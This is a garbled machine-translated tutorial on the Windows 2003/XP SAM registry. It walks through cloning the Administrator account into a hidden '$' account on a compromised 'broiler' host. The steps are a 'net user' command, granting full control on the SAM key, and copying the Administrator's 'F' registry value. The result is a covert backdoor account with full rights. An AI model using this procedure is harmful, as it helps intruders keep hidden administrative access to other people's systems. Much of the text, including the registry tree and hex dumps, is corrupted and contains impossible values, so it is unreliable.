The regedit.exe and regedt32.exe Win2003 in Regedt32.exe XP have two registry editors in the regedit.exe and regedt32.exe in the regedit.exe and regedt32.exe in the regedt32.exe. For regedit.exe, I think everyone should be very familiar, but it cannot set permissions to the registry, and the maximum advantage of regedt32.exe is to set permissions to the registry. Both NT / 2000 / XP / 2003 account information under the HKEY_LOCAL_MACHINE / SAM / SAM key of the registry, but other users have no right to view the information in addition to the system user system. Here are this about this SAM SAM (Security Account Manager Security) responsible for the control and maintenance of the SAM database. The SAM database is located under the registry HKLM / SAM / SAM, which is protected by ACL, you can open the Registry Editor using Regedt32.exe and set the appropriate permissions to view the contents of the SAM. SAM databases are saved on the disk file in the% systemroot% system32 / config / directory, including a security file, is the content of the secure database, and there are many relationships. (Because I don't know much about it.) The SAM database contains information about all groups, accounts, including password Hash, SID, etc. Now the system I analyzed - Chinese Win2003 Server as an example. (Sorry, because I didn't load 2k: () first with regedt32.exe (2003 with regedit) to the SAM key to "full control" permissions. This can read and write the information in the SAM button. .
Expand Registry HKEY_LOCAL_MACHINE_SAM: | ---- SAM | ---- Domains | | ---- Accent | | | ---- 000003E8 | | | | ---- 000003EA | | | | | | | | ---- 000003EA | | | | ---- Members | | | | | | | ---- 000003EA | | | | | | --- 00000013 | | | | | | ---- 00000013 | | | | | ---- S-1-5-21-317928648-61192537-2235348617 | | | | | | | ---- 000003ED | | | | ---- Name | | | | ---- HelpserviceSGroup | | | | | | ---- TelnetClients | | | Grpup | | | ---- 00000201 | | | | ---- Name | | | ---- Users | | | --- 000001F4 | | -000001F5 | | | ---- 000003E9 | | | ---- 000003ed | | | ---- NAMES | | | ---- Net2k $ | | Guest | | | ---- IUSR_Net2k-kaxxy6sz3 | | | ---- iWam_Net2k-Kaxxy6SZ3 | | | ---- Support_388945a0 | | ---- Builtin | | ---- Aliases | | 00000220 | | | ---- 00000222 | | | ---- 00000226 | | | ---- 00000227 | | | | | ---- 0000022B | | | ---- 0000022E | | | ---- 0000022F | | | ---- MEMBERS | | | ---- S-1 -5 | | | | ---- 00 000004 | | | | ---- 0000000B | | | | | ---- 00 00000014 | | | ---- S-1-5-21-3179286488-61192537-2235348617 | | | 000001F4 | | | | ---- 000003ec | | | ---- names | | | ----ACKITORS | | | -Guests | | | ---- NetWork Configuration Operators | | | ---- Performance Monitor Users | | | ---- Power Users | | | ---- Print Operators | | | ---- Remote Desktop Uses | | | ---- Replicator | | ---- Uses | | --- Names | | --- Names | ---- Rxact This is the structure of the SAM database in the registry on my machine, SAM tree. In the entire database, the main content of the account is below: In / domains / under the domain (or unit) SAM content, there are two branches "Account" and "Builtin". / Domains / Account is the content of the user account. / Domains / Account / Users are information about each account. The subkey under which is the SID relative flag of each account.
For example, 000001F4, there are two children, f and v under each account. Where / names / under the user account name, each account name has only one default child, the type is not a general registry data type, but the last item of the SID of the flag (relative identifier), such as The administrator under which the type is 0x1f4, so it corresponds to the content of the account name Administrator from the previous 000001F4. If we change the type in an account to 0x1f4, then this account will be directed to the account of the class 000001f4. And this account 000001F4 is the Administrator account, so that the system is completely converted to the Administrator account during the login process, and the information used by the modified account is Adminisrtator content, including password, permissions, desktop, Record, access time, etc., this is the purpose of the so-called cloning super administrator account. Due to the limitations of my own level, the SAM database is no longer introduced. If you want to know more, you can find your information yourself. The following is mainly to describe how to implement this clone and hide the account. Learn about these, the next job is easier to do. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Net2 $, here I set up this in the command line Account, as follows: NET user NET2K $ 123456 / Add 2, in "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe. Open button: hkey_local_maichine / sam / sam / domains / account / user / names / net2k $ "3, export item NET2 $, 000003F2, 000001F4 to kelong.REG, 3f2.reg, admin.reg, use notepad to separate this Several exported files are edited, copy the value of the key "f" of the key corresponding to the entries 000001f4, and override the value of the key "f" under the item 000003f2 of Net2K $, detailed steps, the content is as follows: item 000001F4 The lower key "f" content: "f" = HEX: 02,00, 01, 100, 100, 100, 100, 58, 35, E6, Ba, B7, 85, C4, 01, 100 ,00 00, 00, 00, 00, / 00, 6A, 09, B0, B2, 6F, 71, C4, 01, 100, 100, 100, 100, 100, 100, 32, 47, EC, F7, 5C, 84, C4, 01, / F4, 01, 100, 01, 02, 100, 100, 10, 100, 100, 100, 100, 100, 100, 86 The contents of the key "f" under the SID item 000003F2 of 00, 100,00, 100,000, 00, 00 ,00 ,00 ,00 account NET2K $: "f" = HEX: 02,00,00, 00, 00, 00 ,00, 00, 00, 00, 00, 00, 00, 00, CE , 21, 90, CA, EB, 85 ,. C4, 01, 100,000, 100,000, 100,000, 100,000, 100,000, 100,000, 100, 100, / f2, 03,00, 01, 02, 00, 10,000, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, / 00, 00, / 00 00, 00, 00, 00, 5F, 00 and then add 03f2.Reg to Kelong.REG.
